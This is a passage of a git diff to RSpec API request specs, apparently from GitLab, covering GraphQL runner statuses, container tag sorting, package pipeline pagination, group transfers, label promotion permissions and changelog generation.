'Missing runner 1', created_at: 1.month.ago, contacted_at: nil) } + + let(:status_fragment) do + %( + status + legacyStatusWithExplicitVersion: status(legacyMode: "14.5") + newStatus: status(legacyMode: null) + ) + end + + let(:query) do + %( + query { + staleRunner: runner(id: "#{stale_runner.to_global_id}") { #{status_fragment} } + pausedRunner: runner(id: "#{inactive_instance_runner.to_global_id}") { #{status_fragment} } + neverContactedInstanceRunner: runner(id: "#{never_contacted_instance_runner.to_global_id}") { #{status_fragment} } + } + ) + end + + it 'retrieves status fields with expected values' do + post_graphql(query, current_user: user) + + stale_runner_data = graphql_data_at(:stale_runner) + expect(stale_runner_data).to match a_hash_including( + 'status' => 'NOT_CONNECTED', + 'legacyStatusWithExplicitVersion' => 'NOT_CONNECTED', + 'newStatus' => 'STALE' + ) + + paused_runner_data = graphql_data_at(:paused_runner) + expect(paused_runner_data).to match a_hash_including( + 'status' => 'PAUSED', + 'legacyStatusWithExplicitVersion' => 'PAUSED', + 'newStatus' => 'OFFLINE' + ) + + never_contacted_instance_runner_data = graphql_data_at(:never_contacted_instance_runner) + expect(never_contacted_instance_runner_data).to match a_hash_including( + 'status' => 'NOT_CONNECTED', + 'legacyStatusWithExplicitVersion' => 'NOT_CONNECTED', + 'newStatus' => 'NEVER_CONTACTED' + ) + end + end + describe 'for multiple runners' do let_it_be(:project1) { create(:project, :test_repo) } let_it_be(:project2) { create(:project, :test_repo) } diff --git a/spec/requests/api/graphql/ci/runners_spec.rb b/spec/requests/api/graphql/ci/runners_spec.rb index 51a07e60e15..267dd1b5e6f 100644 --- a/spec/requests/api/graphql/ci/runners_spec.rb +++ b/spec/requests/api/graphql/ci/runners_spec.rb @@ -62,6 +62,15 @@ RSpec.describe 'Query.runners' do it_behaves_like 'a working graphql query returning expected runner' end + + context 'runner_type is PROJECT_TYPE and status is NEVER_CONTACTED' do + let(:runner_type) { 'PROJECT_TYPE' } + let(:status) { 'NEVER_CONTACTED' } + + let!(:expected_runner) { project_runner } + + it_behaves_like 'a working graphql query returning expected runner' + end end describe 'pagination' do diff --git a/spec/requests/api/graphql/container_repository/container_repository_details_spec.rb b/spec/requests/api/graphql/container_repository/container_repository_details_spec.rb index d93afcc0f33..802ab847b3d 100644 --- a/spec/requests/api/graphql/container_repository/container_repository_details_spec.rb +++ b/spec/requests/api/graphql/container_repository/container_repository_details_spec.rb @@ -30,6 +30,14 @@ RSpec.describe 'container repository details' do subject { post_graphql(query, current_user: user, variables: variables) } + shared_examples 'returning an invalid value error' do + it 'returns an error' do + subject + + expect(graphql_errors.first.dig('message')).to match(/invalid value/) + end + end + it_behaves_like 'a working graphql query' do before do subject @@ -138,6 +146,80 @@ RSpec.describe 'container repository details' do end end + context 'sorting the tags' do + let(:sort) { 'NAME_DESC' } + let(:tags_response) { container_repository_details_response.dig('tags', 'edges') } + let(:variables) do + { id: container_repository_global_id, n: sort } + end + + let(:query) do + <<~GQL + query($id: ID!, $n: ContainerRepositoryTagSort) { + containerRepository(id: $id) { + tags(sort: $n) { + edges { + node { + #{all_graphql_fields_for('ContainerRepositoryTag')} + } + } + } + } + } + GQL + end + + it 'sorts the tags', :aggregate_failures do + subject + + expect(tags_response.first.dig('node', 'name')).to eq('tag5') + expect(tags_response.last.dig('node', 'name')).to eq('latest') + end + + context 'invalid sort' do + let(:sort) { 'FOO_ASC' } + + it_behaves_like 'returning an invalid value error' + end + end + + context 'filtering by name' do + let(:name) { 'l' } + let(:tags_response) { container_repository_details_response.dig('tags', 'edges') } + let(:variables) do + { id: container_repository_global_id, n: name } + end + + let(:query) do + <<~GQL + query($id: ID!, $n: String) { + containerRepository(id: $id) { + tags(name: $n) { + edges { + node { + #{all_graphql_fields_for('ContainerRepositoryTag')} + } + } + } + } + } + GQL + end + + it 'sorts the tags', :aggregate_failures do + subject + + expect(tags_response.size).to eq(1) + expect(tags_response.first.dig('node', 'name')).to eq('latest') + end + + context 'invalid filter' do + let(:name) { 1 } + + it_behaves_like 'returning an invalid value error' + end + end + context 'with tags with a manifest containing nil fields' do let(:tags_response) { container_repository_details_response.dig('tags', 'nodes') } let(:errors) { container_repository_details_response.dig('errors') } diff --git a/spec/requests/api/graphql/current_user/todos_query_spec.rb b/spec/requests/api/graphql/current_user/todos_query_spec.rb index 981b10a7467..5a45f0db518 100644 --- a/spec/requests/api/graphql/current_user/todos_query_spec.rb +++ b/spec/requests/api/graphql/current_user/todos_query_spec.rb @@ -69,7 +69,7 @@ RSpec.describe 'Query current user todos' do QUERY end - it 'avoids N+1 queries', :request_store do + it 'avoids N+1 queries', :request_store, quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/338671' do control = ActiveRecord::QueryRecorder.new { post_graphql(query, current_user: current_user) } project2 = create(:project) diff --git a/spec/requests/api/graphql/mutations/design_management/delete_spec.rb b/spec/requests/api/graphql/mutations/design_management/delete_spec.rb index 1dffb86b344..1f43f113e65 100644 --- a/spec/requests/api/graphql/mutations/design_management/delete_spec.rb +++ b/spec/requests/api/graphql/mutations/design_management/delete_spec.rb @@ -53,7 +53,7 @@ RSpec.describe "deleting designs" do context 'the designs list contains filenames we cannot find' do it_behaves_like 'a failed request' do - let(:designs) { %w/foo bar baz/.map { |fn| instance_double('file', filename: fn) } } + let(:designs) { %w/foo bar baz/.map { |fn| double('file', filename: fn) } } let(:the_error) { a_string_matching %r/filenames were not found/ } end end diff --git a/spec/requests/api/graphql/mutations/issues/set_crm_contacts_spec.rb b/spec/requests/api/graphql/mutations/issues/set_crm_contacts_spec.rb index 3da702c55d7..2da69509ad6 100644 --- a/spec/requests/api/graphql/mutations/issues/set_crm_contacts_spec.rb +++ b/spec/requests/api/graphql/mutations/issues/set_crm_contacts_spec.rb @@ -12,7 +12,7 @@ RSpec.describe 'Setting issues crm contacts' do let(:issue) { create(:issue, project: project) } let(:operation_mode) { Types::MutationOperationModeEnum.default_mode } - let(:crm_contact_ids) { [global_id_of(contacts[1]), global_id_of(contacts[2])] } + let(:contact_ids) { [global_id_of(contacts[1]), global_id_of(contacts[2])] } let(:does_not_exist_or_no_permission) { "The resource that you are attempting to access does not exist or you don't have permission to perform this action" } let(:mutation) do @@ -20,7 +20,7 @@ RSpec.describe 'Setting issues crm contacts' do project_path: issue.project.full_path, iid: issue.iid.to_s, operation_mode: operation_mode, - crm_contact_ids: crm_contact_ids + contact_ids: contact_ids } graphql_mutation(:issue_set_crm_contacts, variables, @@ -83,7 +83,7 @@ RSpec.describe 'Setting issues crm contacts' do end context 'append' do - let(:crm_contact_ids) { [global_id_of(contacts[3])] } + let(:contact_ids) { [global_id_of(contacts[3])] } let(:operation_mode) { Types::MutationOperationModeEnum.enum[:append] } it 'updates the issue with correct contacts' do @@ -95,7 +95,7 @@ RSpec.describe 'Setting issues crm contacts' do end context 'remove' do - let(:crm_contact_ids) { [global_id_of(contacts[0])] } + let(:contact_ids) { [global_id_of(contacts[0])] } let(:operation_mode) { Types::MutationOperationModeEnum.enum[:remove] } it 'updates the issue with correct contacts' do @@ -107,7 +107,7 @@ RSpec.describe 'Setting issues crm contacts' do end context 'when the contact does not exist' do - let(:crm_contact_ids) { ["gid://gitlab/CustomerRelations::Contact/#{non_existing_record_id}"] } + let(:contact_ids) { ["gid://gitlab/CustomerRelations::Contact/#{non_existing_record_id}"] } it 'returns expected error' do post_graphql_mutation(mutation, current_user: user) @@ -120,7 +120,7 @@ RSpec.describe 'Setting issues crm contacts' do context 'when the contact belongs to a different group' do let(:group2) { create(:group) } let(:contact) { create(:contact, group: group2) } - let(:crm_contact_ids) { [global_id_of(contact)] } + let(:contact_ids) { [global_id_of(contact)] } before do group2.add_reporter(user) @@ -137,7 +137,7 @@ RSpec.describe 'Setting issues crm contacts' do context 'when attempting to add more than 6' do let(:operation_mode) { Types::MutationOperationModeEnum.enum[:append] } let(:gid) { global_id_of(contacts[0]) } - let(:crm_contact_ids) { [gid, gid, gid, gid, gid, gid, gid] } + let(:contact_ids) { [gid, gid, gid, gid, gid, gid, gid] } it 'returns expected error' do post_graphql_mutation(mutation, current_user: user) @@ -149,7 +149,7 @@ RSpec.describe 'Setting issues crm contacts' do context 'when trying to remove non-existent contact' do let(:operation_mode) { Types::MutationOperationModeEnum.enum[:remove] } - let(:crm_contact_ids) { ["gid://gitlab/CustomerRelations::Contact/#{non_existing_record_id}"] } + let(:contact_ids) { ["gid://gitlab/CustomerRelations::Contact/#{non_existing_record_id}"] } it 'raises expected error' do post_graphql_mutation(mutation, current_user: user) diff --git a/spec/requests/api/graphql/mutations/user_callouts/create_spec.rb b/spec/requests/api/graphql/mutations/user_callouts/create_spec.rb index 716983f01d2..28a46583d2a 100644 --- a/spec/requests/api/graphql/mutations/user_callouts/create_spec.rb +++ b/spec/requests/api/graphql/mutations/user_callouts/create_spec.rb @@ -7,7 +7,7 @@ RSpec.describe 'Create a user callout' do let_it_be(:current_user) { create(:user) } - let(:feature_name) { ::UserCallout.feature_names.each_key.first } + let(:feature_name) { ::Users::Callout.feature_names.each_key.first } let(:input) do { diff --git a/spec/requests/api/graphql/packages/package_spec.rb b/spec/requests/api/graphql/packages/package_spec.rb index 83ea9ff4dc8..a9019a7611a 100644 --- a/spec/requests/api/graphql/packages/package_spec.rb +++ b/spec/requests/api/graphql/packages/package_spec.rb @@ -4,7 +4,7 @@ require 'spec_helper' RSpec.describe 'package details' do include GraphqlHelpers - let_it_be(:project) { create(:project) } + let_it_be_with_reload(:project) { create(:project) } let_it_be(:composer_package) { create(:composer_package, project: project) } let_it_be(:composer_json) { { name: 'name', type: 'type', license: 'license', version: 1 } } let_it_be(:composer_metadatum) do @@ -68,7 +68,7 @@ RSpec.describe 'package details' do subject expect(graphql_data_at(:package, :versions, :nodes, :version)).to be_present - expect(graphql_data_at(:package, :versions, :nodes, :versions, :nodes)).to be_empty + expect(graphql_data_at(:package, :versions, :nodes, :versions, :nodes)).to eq [nil, nil] end end end @@ -96,4 +96,87 @@ RSpec.describe 'package details' do expect(graphql_data_at(:b)).to be(nil) end end + + context 'with unauthorized user' do + let_it_be(:user) { create(:user) } + + before do + project.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) + end + + it 'returns no packages' do + subject + + expect(graphql_data_at(:package)).to be_nil + end + end + + context 'pipelines field', :aggregate_failures do + let(:pipelines) { create_list(:ci_pipeline, 6, project: project) } + let(:pipeline_gids) { pipelines.sort_by(&:id).map(&:to_gid).map(&:to_s).reverse } + + before do + composer_package.pipelines = pipelines + composer_package.save! + end + + def run_query(args) + pipelines_nodes = <<~QUERY + nodes { + id + } + pageInfo { + startCursor + endCursor + } + QUERY + + query = graphql_query_for(:package, { id: package_global_id }, query_graphql_field("pipelines", args, pipelines_nodes)) + post_graphql(query, current_user: user) + end + + it 'loads the second page with pagination first correctly' do + run_query(first: 2) + pipeline_ids = graphql_data.dig('package', 'pipelines', 'nodes').pluck('id') + + expect(pipeline_ids).to eq(pipeline_gids[0..1]) + + cursor = graphql_data.dig('package', 'pipelines', 'pageInfo', 'endCursor') + + run_query(first: 2, after: cursor) + + pipeline_ids = graphql_data.dig('package', 'pipelines', 'nodes').pluck('id') + + expect(pipeline_ids).to eq(pipeline_gids[2..3]) + end + + it 'loads the second page with pagination last correctly' do + run_query(last: 2) + pipeline_ids = graphql_data.dig('package', 'pipelines', 'nodes').pluck('id') + + expect(pipeline_ids).to eq(pipeline_gids[4..5]) + + cursor = graphql_data.dig('package', 'pipelines', 'pageInfo', 'startCursor') + + run_query(last: 2, before: cursor) + + pipeline_ids = graphql_data.dig('package', 'pipelines', 'nodes').pluck('id') + + expect(pipeline_ids).to eq(pipeline_gids[2..3]) + end + + context 'with unauthorized user' do + let_it_be(:user) { create(:user) } + + before do + project.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) + end + + it 'returns no packages' do + run_query(first: 2) + + expect(graphql_data_at(:package)).to be_nil + end + end + end end diff --git a/spec/requests/api/graphql/project/cluster_agents_spec.rb b/spec/requests/api/graphql/project/cluster_agents_spec.rb index dc7254dd552..585126f3849 100644 --- a/spec/requests/api/graphql/project/cluster_agents_spec.rb +++ b/spec/requests/api/graphql/project/cluster_agents_spec.rb @@ -7,7 +7,7 @@ RSpec.describe 'Project.cluster_agents' do let_it_be(:project) { create(:project, :public) } let_it_be(:current_user) { create(:user, maintainer_projects: [project]) } - let_it_be(:agents) { create_list(:cluster_agent, 5, project: project) } + let_it_be(:agents) { create_list(:cluster_agent, 3, project: project) } let(:first) { var('Int') } let(:cluster_agents_fields) { nil } @@ -105,4 +105,37 @@ RSpec.describe 'Project.cluster_agents' do }) end end + + context 'selecting activity events' do + let_it_be(:token) { create(:cluster_agent_token, agent: agents.first) } + let_it_be(:event) { create(:agent_activity_event, agent: agents.first, agent_token: token, user: current_user) } + + let(:cluster_agents_fields) { [:id, query_nodes(:activity_events, of: 'ClusterAgentActivityEvent', max_depth: 2)] } + + it 'retrieves activity event details' do + post_graphql(query, current_user: current_user) + + response = graphql_data_at(:project, :cluster_agents, :nodes, :activity_events, :nodes).first + + expect(response).to include({ + 'kind' => event.kind, + 'level' => event.level, + 'recordedAt' => event.recorded_at.iso8601, + 'agentToken' => hash_including('name' => token.name), + 'user' => hash_including('name' => current_user.name) + }) + end + + it 'preloads associations to prevent N+1 queries' do + user = create(:user) + token = create(:cluster_agent_token, agent: agents.second) + create(:agent_activity_event, agent: agents.second, agent_token: token, user: user) + + post_graphql(query, current_user: current_user) + + expect do + post_graphql(query, current_user: current_user) + end.to issue_same_number_of_queries_as { post_graphql(query, current_user: current_user, variables: [first.with(1)]) } + end + end end diff --git a/spec/requests/api/graphql/project/jobs_spec.rb b/spec/requests/api/graphql/project/jobs_spec.rb new file mode 100644 index 00000000000..1a823ede9ac --- /dev/null +++ b/spec/requests/api/graphql/project/jobs_spec.rb @@ -0,0 +1,56 @@ +# frozen_string_literal: true +require 'spec_helper' + +RSpec.describe 'Query.project.jobs' do + include GraphqlHelpers + + let_it_be(:project) { create(:project, :repository, :public) } + let_it_be(:user) { create(:user) } + + let(:pipeline) do + create(:ci_pipeline, project: project, user: user) + end + + let(:query) do + <<~QUERY + { + project(fullPath: "#{project.full_path}") { + jobs { + nodes { + name + previousStageJobsAndNeeds { + nodes { + name + } + } + } + } + } + } + QUERY + end + + it 'does not generate N+1 queries', :request_store, :use_sql_query_cache do + build_stage = create(:ci_stage_entity, position: 1, name: 'build', project: project, pipeline: pipeline) + test_stage = create(:ci_stage_entity, position: 2, name: 'test', project: project, pipeline: pipeline) + create(:ci_build, pipeline: pipeline, stage_idx: build_stage.position, name: 'docker 1 2', stage: build_stage) + create(:ci_build, pipeline: pipeline, stage_idx: build_stage.position, name: 'docker 2 2', stage: build_stage) + create(:ci_build, pipeline: pipeline, stage_idx: test_stage.position, name: 'rspec 1 2', stage: test_stage) + test_job = create(:ci_build, pipeline: pipeline, stage_idx: test_stage.position, name: 'rspec 2 2', stage: test_stage) + create(:ci_build_need, build: test_job, name: 'docker 1 2') + + post_graphql(query, current_user: user) + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + post_graphql(query, current_user: user) + end + + create(:ci_build, name: 'test-a', stage: test_stage, stage_idx: test_stage.position, pipeline: pipeline) + test_b_job = create(:ci_build, name: 'test-b', stage: test_stage, stage_idx: test_stage.position, pipeline: pipeline) + create(:ci_build_need, build: test_b_job, name: 'docker 2 2') + + expect do + post_graphql(query, current_user: user) + end.not_to exceed_all_query_limit(control) + end +end diff --git a/spec/requests/api/graphql/project/pipeline_spec.rb b/spec/requests/api/graphql/project/pipeline_spec.rb index d46ef313563..73e02e2a4b1 100644 --- a/spec/requests/api/graphql/project/pipeline_spec.rb +++ b/spec/requests/api/graphql/project/pipeline_spec.rb @@ -273,6 +273,48 @@ RSpec.describe 'getting pipeline information nested in a project' do end end + context 'N+1 queries on pipeline jobs' do + let(:pipeline) { create(:ci_pipeline, project: project) } + + let(:fields) do + <<~FIELDS + jobs { + nodes { + previousStageJobsAndNeeds { + nodes { + name + } + } + } + } + FIELDS + end + + it 'does not generate N+1 queries', :request_store, :use_sql_query_cache do + build_stage = create(:ci_stage_entity, position: 1, name: 'build', project: project, pipeline: pipeline) + test_stage = create(:ci_stage_entity, position: 2, name: 'test', project: project, pipeline: pipeline) + create(:ci_build, pipeline: pipeline, stage_idx: build_stage.position, name: 'docker 1 2', stage: build_stage) + create(:ci_build, pipeline: pipeline, stage_idx: build_stage.position, name: 'docker 2 2', stage: build_stage) + create(:ci_build, pipeline: pipeline, stage_idx: test_stage.position, name: 'rspec 1 2', stage: test_stage) + test_job = create(:ci_build, pipeline: pipeline, stage_idx: test_stage.position, name: 'rspec 2 2', stage: test_stage) + create(:ci_build_need, build: test_job, name: 'docker 1 2') + + post_graphql(query, current_user: current_user) + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + post_graphql(query, current_user: current_user) + end + + create(:ci_build, name: 'test-a', stage: test_stage, stage_idx: test_stage.position, pipeline: pipeline) + test_b_job = create(:ci_build, name: 'test-b', stage: test_stage, stage_idx: test_stage.position, pipeline: pipeline) + create(:ci_build_need, build: test_b_job, name: 'docker 2 2') + + expect do + post_graphql(query, current_user: current_user) + end.not_to exceed_all_query_limit(control) + end + end + context 'N+1 queries on stages jobs' do let(:depth) { 5 } let(:fields) do diff --git a/spec/requests/api/graphql/project_query_spec.rb b/spec/requests/api/graphql/project_query_spec.rb index e44a7efb354..310a8e9fa33 100644 --- a/spec/requests/api/graphql/project_query_spec.rb +++ b/spec/requests/api/graphql/project_query_spec.rb @@ -143,6 +143,40 @@ RSpec.describe 'getting project information' do end end + context 'when the user has guest access' do + context 'when the project has public pipelines' do + before do + pipeline = create(:ci_pipeline, project: project) + create(:ci_build, project: project, pipeline: pipeline, name: 'a test job') + project.add_guest(current_user) + end + + it 'shows all jobs' do + query = <<~GQL + query { + project(fullPath: "#{project.full_path}") { + jobs { + nodes { + name + stage { + name + } + } + } + } + } + GQL + + post_graphql(query, current_user: current_user) + + expect(graphql_data_at(:project, :jobs, :nodes)).to contain_exactly({ + 'name' => 'a test job', + 'stage' => { 'name' => 'test' } + }) + end + end + end + context 'when the user does not have access to the project' do it 'returns an empty field' do post_graphql(query, current_user: current_user) diff --git a/spec/requests/api/groups_spec.rb b/spec/requests/api/groups_spec.rb index 75f5a974d22..d226bb07c73 100644 --- a/spec/requests/api/groups_spec.rb +++ b/spec/requests/api/groups_spec.rb @@ -174,18 +174,6 @@ RSpec.describe API::Groups do 'Remaining records can be retrieved using keyset pagination.' ) end - - context 'when the feature flag `keyset_pagination_for_groups_api` is disabled' do - before do - stub_feature_flags(keyset_pagination_for_groups_api: false) - end - - it 'returns successful response' do - get api('/groups'), params: { page: 3000, per_page: 25 } - - expect(response).to have_gitlab_http_status(:ok) - end - end end context 'on making requests below the allowed offset pagination threshold' do @@ -247,24 +235,6 @@ RSpec.describe API::Groups do expect(records.size).to eq(1) expect(records.first['id']).to eq(group_2.id) end - - context 'when the feature flag `keyset_pagination_for_groups_api` is disabled' do - before do - stub_feature_flags(keyset_pagination_for_groups_api: false) - end - - it 'ignores the keyset pagination params and performs offset pagination' do - get api('/groups'), params: { pagination: 'keyset', per_page: 1 } - - expect(response).to have_gitlab_http_status(:ok) - records = json_response - expect(records.size).to eq(1) - expect(records.first['id']).to eq(group_1.id) - - params_for_next_page = params_for_next_page(response) - expect(params_for_next_page).not_to include('cursor') - end - end end context 'on making requests with unsupported ordering structure' do @@ -1973,6 +1943,116 @@ RSpec.describe API::Groups do end end + describe 'POST /groups/:id/transfer' do + let_it_be(:user) { create(:user) } + let_it_be_with_reload(:new_parent_group) { create(:group, :private) } + let_it_be_with_reload(:group) { create(:group, :nested, :private) } + + before do + new_parent_group.add_owner(user) + group.add_owner(user) + end + + def make_request(user) + post api("/groups/#{group.id}/transfer", user), params: params + end + + context 'when promoting a subgroup to a root group' do + shared_examples_for 'promotes the subgroup to a root group' do + it 'returns success' do + make_request(user) + + expect(response).to have_gitlab_http_status(:created) + expect(json_response['parent_id']).to be_nil + end + end + + context 'when no group_id is specified' do + let(:params) {} + + it_behaves_like 'promotes the subgroup to a root group' + end + + context 'when group_id is specified as blank' do + let(:params) { { group_id: '' } } + + it_behaves_like 'promotes the subgroup to a root group' + end + + context 'when the group is already a root group' do + let(:group) { create(:group) } + let(:params) { { group_id: '' } } + + it 'returns error' do + make_request(user) + + expect(response).to have_gitlab_http_status(:bad_request) + expect(json_response['message']).to eq('Transfer failed: Group is already a root group.') + end + end + end + + context 'when transferring a subgroup to a different group' do + let(:params) { { group_id: new_parent_group.id } } + + context 'when the user does not have admin rights to the group being transferred' do + it 'forbids the operation' do + developer_user = create(:user) + group.add_developer(developer_user) + + make_request(developer_user) + + expect(response).to have_gitlab_http_status(:forbidden) + end + end + + context 'when the user does not have access to the new parent group' do + it 'fails with 404' do + user_without_access_to_new_parent_group = create(:user) + group.add_owner(user_without_access_to_new_parent_group) + + make_request(user_without_access_to_new_parent_group) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when the ID of a non-existent group is mentioned as the new parent group' do + let(:params) { { group_id: non_existing_record_id } } + + it 'fails with 404' do + make_request(user) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when the transfer fails due to an error' do + before do + expect_next_instance_of(::Groups::TransferService) do |service| + expect(service).to receive(:proceed_to_transfer).and_raise(Gitlab::UpdatePathError, 'namespace directory cannot be moved') + end + end + + it 'returns error' do + make_request(user) + + expect(response).to have_gitlab_http_status(:bad_request) + expect(json_response['message']).to eq('Transfer failed: namespace directory cannot be moved') + end + end + + context 'when the transfer succceds' do + it 'returns success' do + make_request(user) + + expect(response).to have_gitlab_http_status(:created) + expect(json_response['parent_id']).to eq(new_parent_group.id) + end + end + end + end + it_behaves_like 'custom attributes endpoints', 'groups' do let(:attributable) { group1 } let(:other_attributable) { group2 } diff --git a/spec/requests/api/import_github_spec.rb b/spec/requests/api/import_github_spec.rb index d5fed330401..f0c4fcc4f29 100644 --- a/spec/requests/api/import_github_spec.rb +++ b/spec/requests/api/import_github_spec.rb @@ -11,12 +11,12 @@ RSpec.describe API::ImportGithub do let(:user) { create(:user) } let(:project) { create(:project) } let(:provider_username) { user.username } - let(:provider_user) { OpenStruct.new(login: provider_username) } + let(:provider_user) { double('provider', login: provider_username) } let(:provider_repo) do - OpenStruct.new( + double('provider', name: 'vim', full_name: "#{provider_username}/vim", - owner: OpenStruct.new(login: provider_username) + owner: double('provider', login: provider_username) ) end diff --git a/spec/requests/api/invitations_spec.rb b/spec/requests/api/invitations_spec.rb index cba4256adc5..702e6ef0a2a 100644 --- a/spec/requests/api/invitations_spec.rb +++ b/spec/requests/api/invitations_spec.rb @@ -152,25 +152,7 @@ RSpec.describe API::Invitations do end end - context 'with areas_of_focus', :snowplow do - it 'tracks the areas_of_focus from params' do - post invitations_url(source, maintainer), - params: { email: email, access_level: Member::DEVELOPER, areas_of_focus: 'Other' } - - expect_snowplow_event( - category: 'Members::InviteService', - action: 'area_of_focus', - label: 'Other', - property: source.members.last.id.to_s - ) - end - end - context 'with tasks_to_be_done and tasks_project_id in the params' do - before do - stub_experiments(invite_members_for_task: true) - end - let(:project_id) { source_type == 'project' ? source.id : create(:project, namespace: source).id } context 'when there is 1 invitation' do diff --git a/spec/requests/api/issues/get_project_issues_spec.rb b/spec/requests/api/issues/get_project_issues_spec.rb index 07fa1d40f7b..9948e13e9ae 100644 --- a/spec/requests/api/issues/get_project_issues_spec.rb +++ b/spec/requests/api/issues/get_project_issues_spec.rb @@ -873,7 +873,7 @@ RSpec.describe API::Issues do end it 'returns 404 if the issue is confidential' do - post api("/projects/#{project.id}/issues/#{confidential_issue.iid}/participants", non_member) + get api("/projects/#{project.id}/issues/#{confidential_issue.iid}/participants", non_member) expect(response).to have_gitlab_http_status(:not_found) end diff --git a/spec/requests/api/labels_spec.rb b/spec/requests/api/labels_spec.rb index 4b6868f42bc..db9d72245b3 100644 --- a/spec/requests/api/labels_spec.rb +++ b/spec/requests/api/labels_spec.rb @@ -589,6 +589,15 @@ RSpec.describe API::Labels do expect(response).to have_gitlab_http_status(:forbidden) end + it 'returns 403 if reporter promotes label' do + reporter = create(:user) + project.add_reporter(reporter) + + put api("/projects/#{project.id}/labels/promote", reporter), params: { name: label1.name } + + expect(response).to have_gitlab_http_status(:forbidden) + end + it 'returns 404 if label does not exist' do put api("/projects/#{project.id}/labels/promote", user), params: { name: 'unknown' } @@ -601,6 +610,13 @@ RSpec.describe API::Labels do expect(response).to have_gitlab_http_status(:bad_request) expect(json_response['error']).to eq('name is missing') end + + it 'returns 400 if project does not have a group' do + project = create(:project, creator_id: user.id, namespace: user.namespace) + put api("/projects/#{project.id}/labels/promote", user), params: { name: label1.name } + + expect(response).to have_gitlab_http_status(:bad_request) + end end describe "POST /projects/:id/labels/:label_id/subscribe" do diff --git a/spec/requests/api/markdown_golden_master_spec.rb b/spec/requests/api/markdown_golden_master_spec.rb new file mode 100644 index 00000000000..4fa946de342 --- /dev/null +++ b/spec/requests/api/markdown_golden_master_spec.rb @@ -0,0 +1,9 @@ +# frozen_string_literal: true + +require 'spec_helper' + +# See spec/fixtures/markdown/markdown_golden_master_examples.yml for documentation on how this spec works. +RSpec.describe API::Markdown, 'Golden Master' do + markdown_yml_file_path = File.expand_path('../../fixtures/markdown/markdown_golden_master_examples.yml', __dir__) + include_context 'API::Markdown Golden Master shared context', markdown_yml_file_path +end diff --git a/spec/requests/api/members_spec.rb b/spec/requests/api/members_spec.rb index 7f4345faabb..02061bb8ab6 100644 --- a/spec/requests/api/members_spec.rb +++ b/spec/requests/api/members_spec.rb @@ -387,38 +387,7 @@ RSpec.describe API::Members do end end - context 'with areas_of_focus considerations', :snowplow do - let(:user_id) { stranger.id } - - context 'when areas_of_focus is present in params' do - it 'tracks the areas_of_focus' do - post api("/#{source_type.pluralize}/#{source.id}/members", maintainer), - params: { user_id: user_id, access_level: Member::DEVELOPER, areas_of_focus: 'Other' } - - expect_snowplow_event( - category: 'Members::CreateService', - action: 'area_of_focus', - label: 'Other', - property: source.members.last.id.to_s - ) - end - end - - context 'when areas_of_focus is not present in params' do - it 'does not track the areas_of_focus' do - post api("/#{source_type.pluralize}/#{source.id}/members", maintainer), - params: { user_id: user_id, access_level: Member::DEVELOPER } - - expect_no_snowplow_event(category: 'Members::CreateService', action: 'area_of_focus') - end - end - end - context 'with tasks_to_be_done and tasks_project_id in the params' do - before do - stub_experiments(invite_members_for_task: true) - end - let(:project_id) { source_type == 'project' ? source.id : create(:project, namespace: source).id } context 'when there is 1 user to add' do diff --git a/spec/requests/api/project_import_spec.rb b/spec/requests/api/project_import_spec.rb index 097d374640c..3ed08afd57d 100644 --- a/spec/requests/api/project_import_spec.rb +++ b/spec/requests/api/project_import_spec.rb @@ -47,7 +47,7 @@ RSpec.describe API::ProjectImport do it 'executes a limited number of queries' do control_count = ActiveRecord::QueryRecorder.new { subject }.count - expect(control_count).to be <= 101 + expect(control_count).to be <= 104 end it 'schedules an import using a namespace' do diff --git a/spec/requests/api/projects_spec.rb b/spec/requests/api/projects_spec.rb index cc546cbcda1..79dbbd20d83 100644 --- a/spec/requests/api/projects_spec.rb +++ b/spec/requests/api/projects_spec.rb @@ -1160,6 +1160,15 @@ RSpec.describe API::Projects do expect(response).to have_gitlab_http_status(:forbidden) end + it 'allows creating a project without an import_url when git import source is disabled', :aggregate_failures do + stub_application_setting(import_sources: nil) + project_params = { path: 'path-project-Foo' } + + expect { post api('/projects', user), params: project_params }.to change { Project.count }.by(1) + + expect(response).to have_gitlab_http_status(:created) + end + it 'disallows creating a project with an import_url that is not reachable', :aggregate_failures do url = 'http://example.com' endpoint_url = "#{url}/info/refs?service=git-upload-pack" @@ -1504,6 +1513,20 @@ RSpec.describe API::Projects do expect(json_response.map { |project| project['id'] }).to contain_exactly(private_project1.id) end + context 'and using an admin to search', :enable_admin_mode, :aggregate_errors do + it 'returns users projects when authenticated as admin' do + private_project1 = create(:project, :private, name: 'private_project1', creator_id: user4.id, namespace: user4.namespace) + + # min_access_level does not make any difference when admins search for a user's projects + get api("/users/#{user4.id}/projects/", admin), params: { min_access_level: 30 } + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to include_pagination_headers + expect(json_response).to be_an Array + expect(json_response.map { |project| project['id'] }).to contain_exactly(project4.id, private_project1.id, public_project.id) + end + end + context 'and using the programming language filter' do include_context 'with language detection' diff --git a/spec/requests/api/repositories_spec.rb b/spec/requests/api/repositories_spec.rb index f3146480be2..21a8622e08d 100644 --- a/spec/requests/api/repositories_spec.rb +++ b/spec/requests/api/repositories_spec.rb @@ -731,6 +731,71 @@ RSpec.describe API::Repositories do end end + describe 'GET /projects/:id/repository/changelog' do + it 'generates the changelog for a version' do + spy = instance_spy(Repositories::ChangelogService) + release_notes = 'Release notes' + + allow(Repositories::ChangelogService) + .to receive(:new) + .with( + project, + user, + version: '1.0.0', + from: 'foo', + to: 'bar', + date: DateTime.new(2020, 1, 1), + trailer: 'Foo' + ) + .and_return(spy) + + expect(spy).to receive(:execute).with(commit_to_changelog: false).and_return(release_notes) + + get( + api("/projects/#{project.id}/repository/changelog", user), + params: { + version: '1.0.0', + from: 'foo', + to: 'bar', + date: '2020-01-01', + trailer: 'Foo' + } + ) + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['notes']).to eq(release_notes) + end + + it 'supports leaving out the from and to attribute' do + spy = instance_spy(Repositories::ChangelogService) + + allow(Repositories::ChangelogService) + .to receive(:new) + .with( + project, + user, + version: '1.0.0', + date: DateTime.new(2020, 1, 1), + trailer: 'Foo' + ) + .and_return(spy) + + expect(spy).to receive(:execute).with(commit_to_changelog: false) + + get( + api("/projects/#{project.id}/repository/changelog", user), + params: { + version: '1.0.0', + date: 